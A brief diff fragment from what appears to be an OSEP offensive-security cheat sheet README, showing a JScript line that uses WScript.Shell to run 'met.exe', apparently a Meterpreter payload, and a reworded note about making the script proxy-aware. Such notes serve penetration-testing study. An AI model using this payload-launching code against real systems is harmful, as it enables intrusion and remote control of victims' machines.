peterkhe1999/CheatSheet/OSEP/README.md

 var r = new ActiveXObject("WScript.Shell").Run("met.exe");
 ```

-Modify the Jscript code to make it proxy-aware with the **setProxy** method
+Make it proxy-aware with the `setProxy` method

 ### run2.js